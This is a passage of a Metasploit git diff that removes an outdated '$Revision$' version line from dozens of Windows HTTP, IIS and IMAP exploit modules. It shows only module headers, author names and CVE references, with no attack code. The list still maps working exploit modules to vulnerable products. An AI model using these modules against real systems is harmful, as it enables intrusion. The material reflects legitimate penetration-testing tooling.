-42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'CVE', '2010-2703' ], diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 996130113b..fe033806b8 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote cookie values, as well as several different CGI applications, can be used. '}, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Nahuel Riva', diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 32e7755964..e2e1f420ca 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index 9019ba3260..f40c8d829c 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit fu 'sinn3r' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3999' ], diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 2d16879fe7..58750f178b 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'sinn3r' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2685' ], diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index a7003b4b30..14a836a9ee 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Trancer ', # Metasploit implementation 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '58714' ], diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 4354b8f855..81b10b1dd2 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery and metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4769' ], diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index 673a36f1d4..af0e9b3ba6 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote this time. }, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-1192'], diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 972ccaf46d..f13259e085 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jeremy Brown <0xjbrown[at]gmail.com>', # original public exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1220'], diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index fca332c7d8..7f9fb8eedf 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'toto', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1868'], diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index ed04250e0a..2493b14183 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4880' ], diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index b4007c3a36..676368f865 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spoonm', 'Luigi Auriemma ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1561'], diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 731d39d40b..bd9b791fee 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # fleshed out module from advisory ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '67909'], diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index c3c4359e16..d4997cd6ea 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60549' ], diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index eb3fa9cad7..fdb74f77cf 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0798'], diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index 34e6f6098c..c73553eaa3 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TheLeader', # original exploit 'sinn3r', # msf commit ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-2268' ], diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index 31261e648b..3a109c16ad 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 52572f260c..3640f8212f 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'David Maciejak ', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1348'], diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index a4568b1ef2..1275f028a6 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( 'Name' => 'ManageEngine Applications Manager Authenticated Code Execution', - 'Version' => '$Revision$', 'Description' => %q{ This module logs into the Manage Engine Appplications Manager to upload a payload to the file system and a batch script that executes the payload. }, diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 8a087abc95..c50598d2dc 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-4305'], diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 77053cac03..b2ee14cb74 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0684'], diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index dbb20255e9..8f0ab99c8f 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5156' ], diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index d5fe97d29e..eb44e32052 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-1200' ], diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index 1f1c538f34..6c669086d4 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'acaro ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2271'], diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index d7fe88e753..54e20108dd 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5112' ], diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 8b194091b6..4534925e48 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index aa7ff30c84..69da703f12 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0992'], diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index be9e1560a8..51ab88bf30 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0871' ], diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 8c457187db..356def0db8 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0727'], diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 0cb35a931a..713a394f83 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ], diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index c5ec42c939..901e2c7aa6 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1148'], diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index f0c9df5954..bd9b5e8274 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez', # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-2329'], diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 84d0166c51..af3dbe1767 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'Michael Thumann ', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3252'], diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index b7b0657a9b..c8d4707b0f 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0313' ], diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index c4dea8f221..6201d62ae6 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2086' ], diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb index 21a8630322..a188653fad 100644 --- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb @@ -19,7 +19,6 @@ class Metasploit4 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'SAP Management Console OSExecute Payload Execution', - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Author' => [ 'Chris John Riley' ], 'Description' => %q{ diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 8dee7523e8..7490a3e1b8 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3614' ], diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index e045c16049..7f7cf7ef55 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1120' ], diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 993cfbaa58..68ae6a81f2 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4006' ], # unsure diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 6bb065a542..06e4dffed2 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'mandragore[at]gmail.com'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1373'], diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index debb76277e..1ccd31c198 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'LMH ', 'hdm', 'skOd'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5216'], diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 1fa617b811..961b372779 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick' # Added references and check code. Default target to XP. ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0550' ], diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 15f2cae734..69e353607a 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2297' ], diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index a870f8fd57..67d66ff07c 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0478'], diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 7416360913..65ad88b17e 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1365' ], diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index dcdb290552..f7cb064f2b 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote Simple HTTP-based Server Using MFC and Windows Sockets". }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-2268' ], diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index abdedb9313..5c92488218 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote execute it. }, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index 49d3409e6e..b44e0534c2 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5067' ], diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 1d3df9adeb..e59e00093f 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '63412' ], diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index d382d657bd..eddda7b76b 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote script using a WebDAV PUT request. }, 'Author' => 'hdm', - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index c705c2b672..4492bfc7da 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0241'], diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index 27b884a3dc..61d34f5695 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0333' ], diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 0101723deb..40eab87f70 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0500'], diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 10081716d7..38068e8e00 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-0874'], diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index ff7abe1c7b..5be76c72cb 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable. }, 'Author' => 'patrick', - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index ba93456d36..11afa8a7f6 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0109'], diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 9115e83fba..5c5d6ba4ee 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4267'], diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 46a8bced66..c431076529 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1520'], diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index 9cfbdf6a97..553a449dcf 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3925' ], diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index a150e7bd09..983b8abafb 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6423'], diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 4063215b0a..1b62b7ceea 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2278'], diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index 2357a3da12..f601bb7911 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -26,7 